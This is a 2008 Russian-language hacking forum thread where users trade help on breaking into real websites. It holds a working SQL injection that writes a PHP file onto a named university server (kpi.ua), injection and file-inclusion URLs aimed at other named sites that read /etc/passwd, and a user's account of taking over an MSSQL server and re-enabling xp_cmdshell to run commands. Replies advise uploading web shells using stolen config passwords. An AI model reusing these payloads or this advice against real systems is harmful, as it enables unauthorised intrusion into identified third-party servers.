Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    http://whois.domaintools.com/aing.kz
     
  2. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339

    Xspider-ом. Он если чо пишет, вряд ли ошибается. Вот по такой ссылке:

    http://kpi.ua/board/index.php?action=list_messages&section_id=2&module=1'

    реальный путь к серверу. А почему подтверждается, что он реальный - написано выше
     
  3. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    Прошелся сканером по папкам, в принципе писать можно в http://kpi.ua/files/, но там почему-то пхп файлы не исполняются ( наверное, в хтакцесе что-то нехорошее прописали), но сканер выдал несколько интересных папок. Ближе к делу -
    Code:
    http://kpi.ua/board/index.php?action=list_messages&section_id=-1+union+select+0x3C3F70687020706870696E666F28293B203F3E+from+mysql.user+into+outfile+'/usr/hosting/www.ntu-kpi.kiev.ua/data/2/photo/xekinfo.php'--
    
    http://kpi.ua/2/photo/xekinfo.php
    Дальше сами...
     
    3 people like this.
  4. masternet

    masternet Elder - Старейшина

    Joined:
    18 May 2008
    Messages:
    58
    Likes Received:
    43
    Reputations:
    0
    подскажите дампер скуль..не сипт..
     
  5. d1aVOL

    d1aVOL Elder - Старейшина

    Joined:
    29 Jul 2007
    Messages:
    37
    Likes Received:
    6
    Reputations:
    0
    такая ошибка что-нибудь полезное означает?
    например: http://www.bar-exclusive.ru/index.php?id=-1

    ЗЫ: контрол + а, ибо черное на черном
     
  6. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Раскрытие путей..
     
  7. SHS

    SHS Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    53
    Likes Received:
    2
    Reputations:
    1
    Назрел у меня вопрос.
    В общем поимел я один MSSQL сервер. Добавил юзера в бд с правами sysadmin. Через клиента приконектился...
    При выполнении запроса exec xp_cmdshell .... Вылезает ошибка следущего ввида:

    -------------------
    Сообщение 0, уровень 16, состояние 0, процедура xp_cmdshell, строка 1
    Cannot load the DLL 123, or one of the DLLs it references. Reason: 126(error not found).
    -------------------

    Что бы это могло означать?
    Как мне показалось ищет не ту ДЛЛ'ку и не там где надо. Как это исправить? :)

    -------

    Ситуация немного прояснилась.

    Админ прописал несуществующую ДЛЛ "123".
    Родная библиотека для xp_cmdshell : xplog70.dll
    Я восстановил все как положено запросами вида:

    exec sp_dropextendedproc 'xp_cmdshell';
    exec sp_addextendedproc 'xp_cmdshell', 'xplog70.dll';

    Но к сожалению не только было указанно неправильное название либы, но и нет её. По крайней мере там, где ищет SQL сервак.
    Есть какие-либо варианты в данном случае? Или сушить вёсла?

    З. Ы. Моя цель - выполнение команд.
     
    #4047 SHS, 9 Dec 2008
    Last edited: 9 Dec 2008
  8. Thrasher88

    Thrasher88 Elder - Старейшина

    Joined:
    18 Apr 2008
    Messages:
    62
    Likes Received:
    13
    Reputations:
    0
    Подскажите метод проведения SQL-инъекций через POST.
    К примеру, нашел я файл index.php с уязвимым параметром get. Как осуществить инъекцию?
     
  9. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    мм.. обычно ..
    посылаешь пакет изменённый и всё ))
     
  10. Thrasher88

    Thrasher88 Elder - Старейшина

    Joined:
    18 Apr 2008
    Messages:
    62
    Likes Received:
    13
    Reputations:
    0
    Ну это ясно... я где то читал что HTTP заголовок нужно переделывать.. что то в этом роде. А можно пример какой-нибудь.. гугл что то не хочет искать подобное :(
     
  11. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Качаешь две проги
    1) Naviscope
    2) InetCrack
    Врубаешь 1ую прогу и заходишь на сайт и вбиваешь что либо в уязвимом get. Naviscope перехватывает пакет
    Потом врубаешь InetCrack и перехваченный пакет вставляешь туда. И там уже развиваешь скуль)) Удачи!!!
     
  12. SHS

    SHS Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    53
    Likes Received:
    2
    Reputations:
    1
    В идеале если юзаешь firefox, то есть плагин полезный. http://livehttpheaders.mozdev.org/
     
  13. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    помоему проще юзать скрипт мэднета, поищи на madnet.name
    да и не факт что будет работать через пост если в скрипте определено что переменная получает значение через гет
    $var = $_GET['var']
     
    #4053 Spyder, 9 Dec 2008
    Last edited by a moderator: 10 Dec 2008
    1 person likes this.
  14. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    http://dcmp.bc.edu/news.php?id=433+and+substring(version(),1,1)=3/*

    Крути :D
     
  15. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Нужен человек, который хорошо разбирается в blind sql... Напиши, пожалуйста, в аську... 5703828
     
  16. SHS

    SHS Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    53
    Likes Received:
    2
    Reputations:
    1
    Народ, какой аналог команды id (unix) в винде есть? Если таковой есть вообще. Чтобы узнать текущего пользователя / права.
     
  17. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    в linux совсем другая система распределения прав.. ;)

    в винде когда cmd запускаешь, всегда оказываешся в папке с именем юзера, т.е
    имя можно еще так узнать:
    Code:
    D:\Documents and Settings\Admin>[B]%username%[/B]
    "[B]Admin[/B]" не является внутренней или внешней
    командой, исполняемой программой или пакетным файлом.
    
    Права на файлы можно командой ATTRIB посмотреть... ;)
     
    #4057 aka PSIH, 11 Dec 2008
    Last edited: 11 Dec 2008
  18. SHS

    SHS Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    53
    Likes Received:
    2
    Reputations:
    1
    Поповоду D:\Documents and Settings\Admin>
    У меня не тот случай, я через скуль. А в остальном спасиб, помогло.
     
  19. rip86

    rip86 New Member

    Joined:
    24 Sep 2008
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    сорри совсем за нубовские вопросы, но все же ... читаю-читаю, но пока многого не догоняю

    вот допустим нашел я пхп инъекцию ( http://сайт/index.php?p=http://google.com )
    ага, гугля отображается ... что дальше? вгружаем шелл.

    на сервак залил файл шелла и пытаюсь инклудить
    1) http://сайт/index.php?p=http://шелл.php - шел открывается, но показывает мой сервак ... получается скрипт выполняется на моем серваке!? и зачем мне это?

    2) пробудем так (где-то читал) http://сайт/index.php?p=http://шелл.txt

    тупо в окне браузера выдает содержание txt'шного файла ... так как же все-таки заинклудить шелл?


    И еще вопросец:

    Почему уязвиость вида
    http://www.pep.spb.org/index.php?p=../../../../../../../../../../../../../etc/passwd
    называют PHP - include'ом и вообще какой от нее толк? Пассов же там нет никаких ... А что мы можем, просто узнав, какие файлы на серваке??

    Всем заранее спасибо, прошу сильно меня не пинать ;)
     
  20. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    rip86
    http://сайт/index.php?p=http://шелл.txt - это видимо просто фрейм или чтто типо того ..
    инклуд шелла, происходит если в скрипте было бы прописано include($_GET['p']); или нечто подобное ..
    а тут чтото вроде echo '<iframe src="'.$_GET['p'].'"></iframe>';
    ---------
    http://www.pep.spb.org/index.php?p=../../../../../../../../../../../../../etc/passwd
    ну конечно смотря какие права есть .. но можно найти пути по ошибкам, потом поискать конфы сервера, пассы от мускуля/админок чтоб шелл залить ..
     
Thread Status:
Not open for further replies.